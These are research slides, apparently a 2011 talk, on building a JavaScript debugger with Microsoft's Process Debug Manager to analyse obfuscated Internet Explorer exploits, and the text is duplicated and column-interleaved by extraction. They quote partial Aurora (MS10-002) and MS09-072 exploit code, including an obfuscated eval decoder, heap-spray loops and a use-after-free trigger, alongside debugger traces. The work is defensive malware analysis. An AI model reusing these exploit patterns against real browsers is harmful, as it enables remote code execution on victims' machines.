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Analysis of obfuscated Java
 Script exploitation using
 process debug manager

                 Ruo Ando
        Network Security Institute,
   National Institute of Information and
 Communication Technology, Tokyo, Japan
        towards alternative Java Script debugger
•   Nowadays, Java Scripts are everywhere (including Android and
    Google App Engine) with the pervasive of JSON (RFC 4627) , JQuery
    (AJAX interface) and so on.

•   Consequently, Java Scripts has become sophisticated with binary
    coding of attack code and obfuscation using concatenation which
    imposes a great burden on security analysis.

•   Unfortunately, there does not exist useful debuggers specified for this
    kind of Java Script eploitation.

•   In this paper we propose the application of extension of MS visual
    studio debugging extension for providing a new techniques for tracing
    Java Script behavior.

•   Proposed system could extract features of some representative web
    attacks such as google Operation Aurora (MS10-002), IE styleObject
    (MS09-072) exploit.
the old new thing;
impact and memory of google aurora operation
 ultra-sophisticated advanced persistent attack
 •   The attack was named "Operation Aurora" by Dmitri Alperovitch, Vice President of
     Threat Research at cyber security company McAfee which informs this attack of
     WhiteHouse on Janurary 2010.

 •   Origin: Operation Aurora is a cyber attack which began in mid-2009 and continued
     through December 2009. The attack was first publicly disclosed by Google on
     January 12, 2010, in a blog post. In the blog post, Google said the attack originated in

 •   Ultra sophisticated: The attacks were both sophisticated and well resourced and
     consistent with an advanced persistent threat attack. The attack has been aimed at
     dozens of other organizations, of which Adobe Systems, Juniper Networks and
     Rackspace have publicly confirmed that they were targeted. According to media
     Yahoo, Symantec, Northrop Grumman, Morgan Stanley and Dow Chemical were also
     among the targets.

 •   Google and china: As a result of the attack, Google stated in its blog that it plans to
     operate a completely uncensored version of its search engine in China "within the law,
     if at all", and acknowledged that if this is not possible it may leave China and close its
     Chinese offices.Official Chinese media responded stating that the incident is part of a
     U.S. government conspiracy. Aurora operation is said to be Chinese Government’s
     attempts to wipe out Google from mainland.
BACKGROUND: attack vector is very short. But …
                 Can we analyze (or debug) this IE exploitation using
                               commodity probes?
<html><head><script>                                  function ev1 (evt)
var sc = unescape("%u9090%u19eb%u4b5b%..)                e1 = document.createEventObject (evt);
var sss = Array (826, 679, 798, 224, 770, 427, 819,      document.getElementById ("sp1").innerHTML = "";
      770, 707, 805, 693, 679, 784, 707, 280,            window.setInterval (ev2, 50);
238, 259, 819, 336, 693, 336, 700, 259, 819, 336,     }
      224, 770, 427, 770, 322, 805, 819, 686,         function ev2 ()
805, 812, 798, 735, 770, 721, 280, 336, 448, 371);    {
var arr = new Array;                                     p = "¥u0c0d¥uu0c0d¥u0c0d¥u0c0d";
for (var i = 0; i < sss.length; i ++) {                  for (i = 0; i < x1.length; i ++) {
   arr[i] = String.fromCharCode (sss [i] / 7);              x1 [i].data = p;
}                                                       };
var cc = arr.toString ();                                var t = e1.srcElement;
cc = cc.replace (/,/g, "");                           }
cc = cc.replace (/@/g, ",");                          </script>
eval (cc);                                            </head>
var x1 = new Array ();
for (i = 0; i < 200; i ++) {                          <body>
   x1 [i] = document.createElement ("COMMENT")        <span id="sp1"><IMG SRC="aaa.gif"
   x1 [i].data = "abc";                               onload="ev1(event)" width="16" height="16"></span>
var e1 = null;

                                                       It is impossible to trace the script engines’ behavior
                                                       allocating memory and gif processing !
the new old thing:
           web attack and Java Script
•   Java Scripts are everywhere (including Android and Google App Engine) with
    the pervasive of JSON (RFC 4627) , JQuery (AJAX interface) and so on.
•   Unfortunately again, there have not been striking probing (debugging) frames
    for tracing Java Script behavior such as google aurora operation said before.

•   In this paper we exploit the debugger extension of Microsoft Visual Studio
    2010 (or later) debugging extension for tracking some famous Java Script
    exploitation dynamically.

•   Windows OS has longer history and therefore more mature interfaces to probe
    Java Script Execution.

•   We can conclude Microsoft PDM extension provide new aspect for analyzing
    malicious Java Script.

•   Techniques we have obtained here could be applied for constructing probe
    modules for other systems such as Dalvik VM of Android because the Java
    Script behavior should be the same regardless of OS (platform) types.
Commodity Debugger is not always enough !
              Java Script and its semantic gap
•    Current popular debugging                      Malicious Java Script

     tools such as ollyDBG and
                                                         Bad thing has been happened
     winDBG are not optimized (or
     enough) for tracing the
     behavior of Web scripting.                MS Active Scripting Engine
•    Sementic gap between kernel /
     user mode debugger and web
                                                     Memory Allocate Read/Write
     application execution layer.                         File I/O request

    We can’t estimate the
                             Semantic Gap        USER mode debugger
    event occurred above    Can’t understand
    by naïve memory and     what is going on
    IO request. API.
                                               MS Dynamic Link Binaries
•     Semantic gap means that                      Jscript.DLL etc
      probe running in user / kernel
      mode layer lacks the                                Native I/O request
                                                             IRQ packets
      knowledge of higher level
      events such as web browser               KERNEL mode debugger
      property change.
PDM and SDM: an extension of Microsoft Visual Studio 2005 – 2010
                                                   and later

                                                   •   PDM and SDM are components of the
                                                       extension of Microsoft Visual Studio

                                                   •   PDM and SDM provides higher level of
                                                       debugging view mainly for web scripting
                                                       such as Java Script.

                                                   •   Process Debug Manager (PDM) is a
                                                       component to make all running
                                                       programs available to VSPackage
                                                       (Visual Studio debugger components).

Manage chain: PDM makes the target process
available to SDM and DE. Session debug
                                                   •   By registering PDM, we can track the
manager (SDM) manages several Debug Engine             function call of high-level API invoked
(DE). DE uses expression evaluator and symbol          by web browser. Also, property change
handler. SDM wraps IDebugExpression2
interface to obtain a stack frame with a help of
                                                       (such as variable substitution) can be
DE by IDebugThread2::EnumFrameInfo.                    logged.
Behavior description of Java Script
                  in this paper
①File Name
  r = debugDocument[i]-


③Code (substitution)
  debugProperty = funcs->getDebugProperty(f);

Sample output:
Start Logging On: 2011/02/18 19:16:49                       Process ID of IE
Process ID:7072
MaxDepth 1
Process Name:Windows Internet Explorer
Filename:                              Depth of logging
Function:JScript global code
      err:Object:{...}                                       Function invoked
      $:Undefined:undefined                                      Property change
    14:var ver="ga3_ie"
    15:if(typeof YAHOO=="undefined"||!YAHOO)                 Executed code
    15:var YAHOO={}                                          substitute
=(""+a[d]).split(".");b=YAHOO;for(e=(c[0]=="YAHOO")                  Executed code
urn b}

Proposed system:
             IE initialization and main loop
                                               Main loop
 Internet Explorer
                           ①URL: what kinds of URL accessed ?
                          hr = sfDesc[i].pdsf->GetCodeContext(&codeContext);
                                     if(hr!=S_OK){goto out ;}
                         hr = codeContext->GetDocumentContext(&docContext[i]);
                                           if(hr!=S_OK){goto out;}
                          hr = docContext[i]->GetDocument(&debugDocument[i]);
   Published by                            if(hr!=S_OK){goto out;}
                                    hr = debugDocument[i]->GetName
  PDM and SDM                 (DOCUMENTNAMETYPE_URL,&filenameStr[i]);
(VS DGB extension)
                               ②Property Change:
                          ②-1:What kinds of function invoked ?

                         ②-2:What kinds of variables changed ?
 Internet Explorer             debugProperty = funcs->getDebugProperty(f);
    (debuggee)                     getPropertyInfoRecursive(debugProperty,props,0);
Two core interfaces of SDM / PDM
• IRemoteDebugApplication Interface
  This registered interface allows the session debug
  manager (SDM) to obtain information about
  programs that have been "published" through the
  IDebugProgramPublisher2 interface.

Outside the debugger
Debugger connect, start and stop

• IApplicationDebugger Interface
  Represents a running application. It does not need to
  correspond to an operating-system process.
  Typically, a debugger targets an application for
  debugging. The Process Debug Manager typically
  implements the application object.

Inside the debugger
CauseBreak, handling breakPoint
Publishing IE (1)
                   injecting my callbacks
hr =PDM->WatchForProviderEvents(
                                               method            description
  // Tell the PDM that we want it to stop
  NULL,                                            Provider2::   Obtains information about
// The PDM                                         GetProvider       programs running, filtered in
                                                   ProcessDat        a variety of ways.
  implementation of this interface does            a
not require the 'port' parameter               IDebugProgram
  processId,                                       Provider2::
                                                                 Gets a program node, given a
                                                                     specific process ID.
// the process id to query                         ProgramNo
// We are interested in script code                              Establishes a callback to watch for
                                                                     provider events associated
  GUID_NULL,                                       WatchForP
                                                                     with specific kinds of
// no launching engine                                               processes.
                                               IDebugProgram     Establishes a locale for any
// callback interface                              Provider2::       language-specific resources
                                                   SetLocale         needed by the DE.
                         Callbacks to inject
Publishing IE (2)
         querying and unmarshaling before launch
for(DWORD pnode = 0;pnode<procData.ProgramNodes.dwCount;pnode++){

    IDebugProviderProgramNode2 *dppn;

    hr = procData.ProgramNodes.Members[pnode]
    if(hr == S_OK){
            IRemoteDebugApplication *rda;                                      CHECK 1
                                                                               QueryInterface: inspects
            hr = dppn->UnmarshalDebuggeeInterface                              wheter the object
    (__uuidof(IRemoteDebugApplication),(void**)&rda);                          (IE in this case)
                                                                                    supports a certain
                                                                                    COM interace. If this
    if(hr == S_OK){                                                                 method returns S_OK,
            procList[numScriptProcs]=processes[cp];                                 Windows OS increments
                                                                                    the object reference count
            applicationDebugger[numScriptProcs] = new                               and the application can
            JSLogApplicationDebugger                                                use the interface.
                                                                                 CHECK 2
            applicationDebugger[numScriptProcs]->startDebugging();               This method is used when the
            numScriptProcs++;                                                    debug engine is running in the
                                                                                 Visual Studio process space
}                                                                                and the program being
                                                                                 debugged is running in its own
                                                                                 process space.
                  OK. Start debugger using                                       Obtains a specified interface
                                                                                 across process boundaries.
              IRemoteDebugApplication Interface
Two core interfaces of
             proposed system: active script debugger interface
•      IRemoteDebugApplication Interface for connect / start / stop debugger of IE

                                                Continues an application that is currently in a breakpoint.

    IRemoteDebugApplication::CauseBreak         Causes the application to break into the debugger at the earliest opportunity.

                                                Connects a debugger to this application.
                                                Disconnects the current debugger from the application.

    IRemoteDebugApplication::GetDebugger        Returns the current debugger connected to the application.

                                                Provides a mechanism for the debugger IDE, running out-of-process to the
                                                     to create objects in the application process.

    IRemoteDebugApplication::QueryAlive         Indicates if the application is responsive.

    IRemoteDebugApplication::Enum               Enumerates all threads known to be associated with the
       Threads                                     application.
    IRemoteDebugApplication::GetName            Returns the name of this application node.

                                                Returns the application node under which all nodes associated with the
                                                    application are added.

    IRemoteDebugApplication::EnumGlobalExpr     Enumerates the global expression contexts for all languages running in this
        essionContexts                              application.
Two core interfaces of
         proposed system: active script debugger interface
•    IDebugApplication Interface for cause/handle breakpoint of IE

    method                          description

                                    Obtains information about programs running,
                                    filtered in a variety of ways.
                                    Gets a program node, given a specific process
    IDebugProgramProvider           Establishes a callback to watch for provider
    2::WatchForProviderEve          events associated with specific kinds of
    nts                             processes.

    IDebugProgramProvider           Establishes a locale for any language-specific
    2::SetLocale                    resources needed by the DE.

    Visual Studio Debugging Extensibility:
Property change detection
  in the main loopDigging stack frames online
                                                         Inspecting stack frames
①Get Function Name                                              typedef struct
sfDesc[i].pdsf-                                        tagDebugStackFrameDescriptor {
   >GetDescriptionString(0,&functionStr[i]);              IDebugStackFrame *pdsf;
                                                            DWORD_PTR dwMin;
                                                            DWORD_PTR dwLim;
②Get File and URL                                               BOOL fFinal;
DebugCodeContext* codeContext;                              IUnknown *punkFinal;
hr = sfDesc[i].pdsf-                                     DebugStackFrameDescriptor;

③Get Property Change                                           typedef struct
debugProperty = funcs-                              DBGPROP_INFO_FLAGS dwValidFields;
   >getDebugProperty(f);                                     BSTR bstrName;
getPropertyInfoRecursive(debugProperty,                      BSTR bstrType;
                                                             BSTR bstrValue;
props,0);                                                  BSTR bstrFullName;
              IDebugStackFrame::GetCodeContext       DBGPROP_ATTRIB_FLAGS dwAttrib;
           IDebugStackFrame::GetDescriptionString       IDebugProperty* pDebugProp;
            IDebugStackFrame::GetLanguageString                      };
①Google Aurora Attack (MS10-002 HTML object memory corruption)
MS10-002 is HTML object memory corruption, known as Google aurora attack.This cyber
attack began in mid 2009 and first publicly disclosed by Google on January by a blog post.
The attack was also named as ”Operation Aurora” by Dmitri Alperovitch. McAfee Labs
discovered that Aurora was included file path on the attacker’s machine.
• MSB-MS10-002
• CVE-2010-0249
• OSVDB-61697

② Active Directory Federation Service Attack
(MS09-072 ATL headers vulnerability)
MS09-072 is the vulnerability of Internet Explorer, which affects Microsoft Active Directory
Federation Service (ADFS). In MS07-072, an active X control build with Microsoft Active
Template Library (ATL) headers could allow advisory to execute remote code. The ATL
vulnerability prompted an out-of-band release earlier this year from Microsoft.
• MSB-MS09-072
• CVE-2009-3672
• OSVDB-50622
• BID-37085
Experiment Google Aurora Attack
1: Start Logging On: 2011/05/30 23:13:54
2: Process ID:3652
3: MaxDepth 2
4: Process Name:Windows Internet Explorer
5: Filename:
6: Function:JScript global code
7: window:DispHTMLWindow2:{...}
8: window.clientInformation:Object:{...}
9: --- snip ---

10: window.event:IHTMLEventObj:null
11: window.external:Object:{...}
12: window.frameElement:IHTMLFrameBase:null
13: window.window:DispHTMLWindow2:{...}
14: pNrDlDURxbASLo:Undefined:undefined
15: OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl:Undefined:undefined
16: CLLFyYpDX:Undefined:undefined                                 Payload
17: HBohOxVqidZHilqXmLPfqaMYiv:Undefined:undefined
18: 5:var pNrDlDURxbASLo = '0c053e66...'
19: pNrDlDURxbASLo:String:"0c053e66..."
20: 6:var OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl = ''
21: OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl:String:"[s]"

22: 7:i = 0
23: i:Number:0                                                  Anomaly Loop detected!
24: 7:i<pNrDlDURxbASLo.length
25: 8:OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl +=                        Exploit or Heap spray?
26: String.fromCharCode
27: (parseInt(pNrDlDURxbASLo.substring(i, i+2), 16))
28: OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl:String:"[s][s]"       var n=unescape("%u0c0d%u0c0d");
29: 7:i+=2
30: i:Number:2
                                                          while(n.length<=524288) n+=n;
31: 7:i<pNrDlDURxbASLo.length
32: 8:OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl +=
33: String.fromCharCode                                   var x=new Array();
34: (parseInt(pNrDlDURxbASLo.substring(i, i+2), 16))
35: OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl:String:"[s][s][s]"    for(var i=0;i<200;i++) {x[i]=n+sc;}
Experiment MS09-072
1: Start Logging On: 2011/05/31 00:18:46
2: Process ID:688
3: MaxDepth 2
4: Process Name:Windows Internet Explorer
5: Filename:
6: Function:JScript - onload function
7: 20:sFsSfxRecSIXauNmBnB()
8: Function:sFsSfxRecSIXauNmBnB
9: DRBfZcPV:Undefined:undefined                                 Payload?
10: AcHKfoIb:Undefined:undefined

14: 6:var DRBfZcPV = unescape
15: DRBfZcPV:Object:{...}
16: 7:var AcHKfoIb =
DRBfZcPV('%u350d%ufc03%u747a%u4976%u2593%f9f%' )
17: AcHKfoIb:String:"*******"
18: 8:var OSGwFEcn =
19: DRBfZcPV( "%"+"u"+"0"+"c"+"0"+"c"+"%u"+"0")
20: OSGwFEcn:String:"**"
21: 9:var pGgrrYDr = 20 + AcHKfoIb.length
22: pGgrrYDr:Number:520
23: 10:while (OSGwFEcn.length < pGgrrYDr)
24: 10:OSGwFEcn +=OSGwFEcn                                  Anomaly loop detected!
25: OSGwFEcn:String:"****"
26: 10:while (OSGwFEcn.length < pGgrrYDr)                   Malicious code is scanning
27: 10:OSGwFEcn+=OSGwFEcn                                   Memory …
28: OSGwFEcnn:String:"********"
29: 10:while (OSGwFEcn.length < pGgrrYDr)
30: 10:OSGwFEcn+=OSGwFEcn
31: OSGwFEcn:String:"******************"
32: 10:while (OSGwFEcn.length < pGgrrYDr)
33: 10:OSGwFEcn+=OSGwFEcn
34: OSGwFEcn:String:"**********************************"I
Conclusion and further works

Writing alternative Java Script debugger is exciting challenge!

It works partly now.
• Java Scripts are everywhere (including Android and Google App Engine)
    with the pervasive of JSON (RFC 4627) , JQuery (AJAX interface) and so
• However and further work: there have not been striking probing (debugging)
    frames for tracing Java Script behavior.
• In this paper we exploit the debugger extension of Microsoft Visual Studio
    2010 (or later) debugging extension for tracking some famous Java Script
    exploitation dynamically.

Extensibility for other operating systems and platforms
• Windows OS is the shortest path to understand Java Script behavior.
   Windows OS has longer history and therefore more mature interfaces to
   probe Java Script Execution. Techniques we have obtained here could be
   applied for constructing probe modules for other systems such as Dalvik VM
   of Android because the Java Script behavior should be the same regardless
   of OS (platform) types.

IT IS NOT ENOUGH :- Memory dump is necessary, eventually
    idea: anomaly loop detection of Java Script + active memory monitoring by
    DLL injection etc.

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Jwis2011 ruo ando

  • 1. Analysis of obfuscated Java Script exploitation using process debug manager Ruo Ando Network Security Institute, National Institute of Information and Communication Technology, Tokyo, Japan
  • 2. Introduction towards alternative Java Script debugger • Nowadays, Java Scripts are everywhere (including Android and Google App Engine) with the pervasive of JSON (RFC 4627) , JQuery (AJAX interface) and so on. • Consequently, Java Scripts has become sophisticated with binary coding of attack code and obfuscation using concatenation which imposes a great burden on security analysis. • Unfortunately, there does not exist useful debuggers specified for this kind of Java Script eploitation. • In this paper we propose the application of extension of MS visual studio debugging extension for providing a new techniques for tracing Java Script behavior. • Proposed system could extract features of some representative web attacks such as google Operation Aurora (MS10-002), IE styleObject (MS09-072) exploit.
  • 3. the old new thing; impact and memory of google aurora operation ultra-sophisticated advanced persistent attack • The attack was named "Operation Aurora" by Dmitri Alperovitch, Vice President of Threat Research at cyber security company McAfee which informs this attack of WhiteHouse on Janurary 2010. • Origin: Operation Aurora is a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China. • Ultra sophisticated: The attacks were both sophisticated and well resourced and consistent with an advanced persistent threat attack. The attack has been aimed at dozens of other organizations, of which Adobe Systems, Juniper Networks and Rackspace have publicly confirmed that they were targeted. According to media reports, Yahoo, Symantec, Northrop Grumman, Morgan Stanley and Dow Chemical were also among the targets. • Google and china: As a result of the attack, Google stated in its blog that it plans to operate a completely uncensored version of its search engine in China "within the law, if at all", and acknowledged that if this is not possible it may leave China and close its Chinese offices.Official Chinese media responded stating that the incident is part of a U.S. government conspiracy. Aurora operation is said to be Chinese Government’s attempts to wipe out Google from mainland.
  • 4. BACKGROUND: attack vector is very short. But … Can we analyze (or debug) this IE exploitation using commodity probes? <html><head><script> function ev1 (evt) { var sc = unescape("%u9090%u19eb%u4b5b%..) e1 = document.createEventObject (evt); var sss = Array (826, 679, 798, 224, 770, 427, 819, document.getElementById ("sp1").innerHTML = ""; 770, 707, 805, 693, 679, 784, 707, 280, window.setInterval (ev2, 50); 238, 259, 819, 336, 693, 336, 700, 259, 819, 336, } 224, 770, 427, 770, 322, 805, 819, 686, function ev2 () 805, 812, 798, 735, 770, 721, 280, 336, 448, 371); { var arr = new Array; p = "¥u0c0d¥uu0c0d¥u0c0d¥u0c0d"; for (var i = 0; i < sss.length; i ++) { for (i = 0; i < x1.length; i ++) { arr[i] = String.fromCharCode (sss [i] / 7); x1 [i].data = p; } }; var cc = arr.toString (); var t = e1.srcElement; cc = cc.replace (/,/g, ""); } cc = cc.replace (/@/g, ","); </script> eval (cc); </head> var x1 = new Array (); for (i = 0; i < 200; i ++) { <body> x1 [i] = document.createElement ("COMMENT") <span id="sp1"><IMG SRC="aaa.gif" x1 [i].data = "abc"; onload="ev1(event)" width="16" height="16"></span> }; var e1 = null; </body> It is impossible to trace the script engines’ behavior allocating memory and gif processing !
  • 5. the new old thing: web attack and Java Script • Java Scripts are everywhere (including Android and Google App Engine) with the pervasive of JSON (RFC 4627) , JQuery (AJAX interface) and so on. • Unfortunately again, there have not been striking probing (debugging) frames for tracing Java Script behavior such as google aurora operation said before. • In this paper we exploit the debugger extension of Microsoft Visual Studio 2010 (or later) debugging extension for tracking some famous Java Script exploitation dynamically. • Windows OS has longer history and therefore more mature interfaces to probe Java Script Execution. • We can conclude Microsoft PDM extension provide new aspect for analyzing malicious Java Script. • Techniques we have obtained here could be applied for constructing probe modules for other systems such as Dalvik VM of Android because the Java Script behavior should be the same regardless of OS (platform) types.
  • 6. Commodity Debugger is not always enough ! Java Script and its semantic gap • Current popular debugging Malicious Java Script tools such as ollyDBG and Bad thing has been happened winDBG are not optimized (or enough) for tracing the behavior of Web scripting. MS Active Scripting Engine • Sementic gap between kernel / user mode debugger and web Memory Allocate Read/Write application execution layer. File I/O request We can’t estimate the Semantic Gap USER mode debugger event occurred above Can’t understand by naïve memory and what is going on IO request. API. MS Dynamic Link Binaries • Semantic gap means that Jscript.DLL etc probe running in user / kernel mode layer lacks the Native I/O request IRQ packets knowledge of higher level events such as web browser KERNEL mode debugger property change.
  • 7. PDM and SDM: an extension of Microsoft Visual Studio 2005 – 2010 and later • PDM and SDM are components of the extension of Microsoft Visual Studio Extension. • PDM and SDM provides higher level of debugging view mainly for web scripting such as Java Script. • Process Debug Manager (PDM) is a component to make all running programs available to VSPackage (Visual Studio debugger components). Manage chain: PDM makes the target process available to SDM and DE. Session debug • By registering PDM, we can track the manager (SDM) manages several Debug Engine function call of high-level API invoked (DE). DE uses expression evaluator and symbol by web browser. Also, property change handler. SDM wraps IDebugExpression2 interface to obtain a stack frame with a help of (such as variable substitution) can be DE by IDebugThread2::EnumFrameInfo. logged.
  • 8. Behavior description of Java Script in this paper ①File Name r = debugDocument[i]- >GetName(DOCUMENTNAMETYPE_URL,&filenameStr[i]); ②Function fDesc[i].pdsf ->GetDescriptionString(0,&functionStr[i]); b2s(functionStr[i],function,BUFLEN); ③Code (substitution) debugProperty = funcs->getDebugProperty(f); getPropertyInfoRecursive(debugProperty,props,0); ④Code(loop) props- >propertyIsChanged(propInfos[i].m_bstrFullName,propInfos[i].m_bstrVa lue)==TRUE)
  • 9. Sample output: Start Logging On: 2011/02/18 19:16:49 Process ID of IE Process ID:7072 MaxDepth 1 Process Name:Windows Internet Explorer Filename: Depth of logging Function:JScript global code window:DispHTMLWindow2:{...} err:Object:{...} Function invoked ver:Undefined:undefined YAHOO:Undefined:undefined d:Undefined:undefined $:Undefined:undefined Property change 14:var ver="ga3_ie" ver:String:"ga3_ie" 15:if(typeof YAHOO=="undefined"||!YAHOO) Executed code 15:var YAHOO={} substitute YAHOO:Object:{...} 15:YAHOO.namespace=function(){var a=arguments,b=null,d,e,c;for(d=0;d<a.length;d=d+1){c =(""+a[d]).split(".");b=YAHOO;for(e=(c[0]=="YAHOO") Executed code ?1:0;e<c.length;e=e+1){b[c[e]]=b[c[e]]||{};b=b[c[e]]}}ret Loop urn b} ……
  • 10. Proposed system: IE initialization and main loop Main loop IApplicationDebugger::onHandleBreakPoint Internet Explorer ①URL: what kinds of URL accessed ? hr = sfDesc[i].pdsf->GetCodeContext(&codeContext); if(hr!=S_OK){goto out ;} hr = codeContext->GetDocumentContext(&docContext[i]); if(hr!=S_OK){goto out;} hr = docContext[i]->GetDocument(&debugDocument[i]); Published by if(hr!=S_OK){goto out;} hr = debugDocument[i]->GetName PDM and SDM (DOCUMENTNAMETYPE_URL,&filenameStr[i]); (VS DGB extension) ②Property Change: ②-1:What kinds of function invoked ? sfDesc[i].pdsf->GetDescriptionString(0,&functionStr[i]); b2s(functionStr[i],function,BUFLEN); ②-2:What kinds of variables changed ? Internet Explorer debugProperty = funcs->getDebugProperty(f); (debuggee) getPropertyInfoRecursive(debugProperty,props,0);
  • 11. Two core interfaces of SDM / PDM • IRemoteDebugApplication Interface This registered interface allows the session debug manager (SDM) to obtain information about programs that have been "published" through the IDebugProgramPublisher2 interface. Outside the debugger Debugger connect, start and stop • IApplicationDebugger Interface Represents a running application. It does not need to correspond to an operating-system process. Typically, a debugger targets an application for debugging. The Process Debug Manager typically implements the application object. Inside the debugger CauseBreak, handling breakPoint
  • 12. Publishing IE (1) injecting my callbacks hr =PDM->WatchForProviderEvents( 0, method description // Tell the PDM that we want it to stop watching IDebugProgram NULL, Provider2:: Obtains information about // The PDM GetProvider programs running, filtered in ProcessDat a variety of ways. implementation of this interface does a not require the 'port' parameter IDebugProgram processId, Provider2:: Gets a program node, given a GetProvider specific process ID. // the process id to query ProgramNo de ScriptEngineFilter, IDebugProgram // We are interested in script code Establishes a callback to watch for Provider2:: provider events associated GUID_NULL, WatchForP with specific kinds of roviderEve // no launching engine processes. nts pMyCallback IDebugProgram Establishes a locale for any // callback interface Provider2:: language-specific resources SetLocale needed by the DE. ); Callbacks to inject
  • 13. Publishing IE (2) querying and unmarshaling before launch for(DWORD pnode = 0;pnode<procData.ProgramNodes.dwCount;pnode++){ IDebugProviderProgramNode2 *dppn; hr = procData.ProgramNodes.Members[pnode] ->QueryInterface(__uuidof(IDebugProviderProgramNode2),(void**)&dppn); if(hr == S_OK){ IRemoteDebugApplication *rda; CHECK 1 QueryInterface: inspects hr = dppn->UnmarshalDebuggeeInterface wheter the object (__uuidof(IRemoteDebugApplication),(void**)&rda); (IE in this case) supports a certain COM interace. If this if(hr == S_OK){ method returns S_OK, procList[numScriptProcs]=processes[cp]; Windows OS increments the object reference count applicationDebugger[numScriptProcs] = new and the application can JSLogApplicationDebugger use the interface. (processId.ProcessId.dwProcessId,rda,maxDepth,maxStack, CHECK 2 heckGlobal); applicationDebugger[numScriptProcs]->startDebugging(); This method is used when the numScriptProcs++; debug engine is running in the Visual Studio process space } and the program being debugged is running in its own process space. OK. Start debugger using Obtains a specified interface across process boundaries. IRemoteDebugApplication Interface
  • 14. Two core interfaces of proposed system: active script debugger interface • IRemoteDebugApplication Interface for connect / start / stop debugger of IE IRemoteDebugApplication::ResumeFromBre Continues an application that is currently in a breakpoint. akPoint IRemoteDebugApplication::CauseBreak Causes the application to break into the debugger at the earliest opportunity. IRemoteDebugApplication::Conn Connects a debugger to this application. ectDebugger IRemoteDebugApplication::DisconnectDebug Disconnects the current debugger from the application. ger IRemoteDebugApplication::GetDebugger Returns the current debugger connected to the application. Provides a mechanism for the debugger IDE, running out-of-process to the IRemoteDebugApplication::CreateInstanceAt application, Application to create objects in the application process. IRemoteDebugApplication::QueryAlive Indicates if the application is responsive. IRemoteDebugApplication::Enum Enumerates all threads known to be associated with the Threads application. IRemoteDebugApplication::GetName Returns the name of this application node. Returns the application node under which all nodes associated with the IRemoteDebugApplication::GetRootNode application are added. IRemoteDebugApplication::EnumGlobalExpr Enumerates the global expression contexts for all languages running in this essionContexts application.
  • 15. Two core interfaces of proposed system: active script debugger interface • IDebugApplication Interface for cause/handle breakpoint of IE method description IDebugProgramProvider Obtains information about programs running, 2::GetProviderProcessDa filtered in a variety of ways. ta IDebugProgramProvider Gets a program node, given a specific process 2::GetProviderProgramN ID. ode IDebugProgramProvider Establishes a callback to watch for provider 2::WatchForProviderEve events associated with specific kinds of nts processes. IDebugProgramProvider Establishes a locale for any language-specific 2::SetLocale resources needed by the DE. Visual Studio Debugging Extensibility:
  • 16. Property change detection in the main loopDigging stack frames online Inspecting stack frames ①Get Function Name typedef struct sfDesc[i].pdsf- tagDebugStackFrameDescriptor { >GetDescriptionString(0,&functionStr[i]); IDebugStackFrame *pdsf; DWORD_PTR dwMin; DWORD_PTR dwLim; ②Get File and URL BOOL fFinal; DebugCodeContext* codeContext; IUnknown *punkFinal; } hr = sfDesc[i].pdsf- DebugStackFrameDescriptor; >GetCodeContext(&codeContext); ③Get Property Change typedef struct DebugPropertyInfo{ debugProperty = funcs- DBGPROP_INFO_FLAGS dwValidFields; >getDebugProperty(f); BSTR bstrName; getPropertyInfoRecursive(debugProperty, BSTR bstrType; BSTR bstrValue; props,0); BSTR bstrFullName; IDebugStackFrame::GetCodeContext DBGPROP_ATTRIB_FLAGS dwAttrib; IDebugStackFrame::GetDescriptionString IDebugProperty* pDebugProp; IDebugStackFrame::GetLanguageString }; IDebugStackFrame::GetThread
  • 17. Experiment ①Google Aurora Attack (MS10-002 HTML object memory corruption) MS10-002 is HTML object memory corruption, known as Google aurora attack.This cyber attack began in mid 2009 and first publicly disclosed by Google on January by a blog post. The attack was also named as ”Operation Aurora” by Dmitri Alperovitch. McAfee Labs discovered that Aurora was included file path on the attacker’s machine. • MSB-MS10-002 • CVE-2010-0249 • OSVDB-61697 ② Active Directory Federation Service Attack (MS09-072 ATL headers vulnerability) MS09-072 is the vulnerability of Internet Explorer, which affects Microsoft Active Directory Federation Service (ADFS). In MS07-072, an active X control build with Microsoft Active Template Library (ATL) headers could allow advisory to execute remote code. The ATL vulnerability prompted an out-of-band release earlier this year from Microsoft. • MSB-MS09-072 • CVE-2009-3672 • OSVDB-50622 • BID-37085
  • 18. Experiment Google Aurora Attack 1: Start Logging On: 2011/05/30 23:13:54 2: Process ID:3652 3: MaxDepth 2 4: Process Name:Windows Internet Explorer 5: Filename: 6: Function:JScript global code 7: window:DispHTMLWindow2:{...} 8: window.clientInformation:Object:{...} 9: --- snip --- 10: window.event:IHTMLEventObj:null 11: window.external:Object:{...} 12: window.frameElement:IHTMLFrameBase:null 13: window.window:DispHTMLWindow2:{...} 14: pNrDlDURxbASLo:Undefined:undefined 15: OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl:Undefined:undefined 16: CLLFyYpDX:Undefined:undefined Payload 17: HBohOxVqidZHilqXmLPfqaMYiv:Undefined:undefined 18: 5:var pNrDlDURxbASLo = '0c053e66...' 19: pNrDlDURxbASLo:String:"0c053e66..." 20: 6:var OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl = '' 21: OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl:String:"[s]" 22: 7:i = 0 23: i:Number:0 Anomaly Loop detected! 24: 7:i<pNrDlDURxbASLo.length 25: 8:OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl += Exploit or Heap spray? 26: String.fromCharCode 27: (parseInt(pNrDlDURxbASLo.substring(i, i+2), 16)) 28: OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl:String:"[s][s]" var n=unescape("%u0c0d%u0c0d"); 29: 7:i+=2 30: i:Number:2 while(n.length<=524288) n+=n; 31: 7:i<pNrDlDURxbASLo.length 32: 8:OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl += n=n.substring(0,524269-sc.length); 33: String.fromCharCode var x=new Array(); 34: (parseInt(pNrDlDURxbASLo.substring(i, i+2), 16)) 35: OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl:String:"[s][s][s]" for(var i=0;i<200;i++) {x[i]=n+sc;}
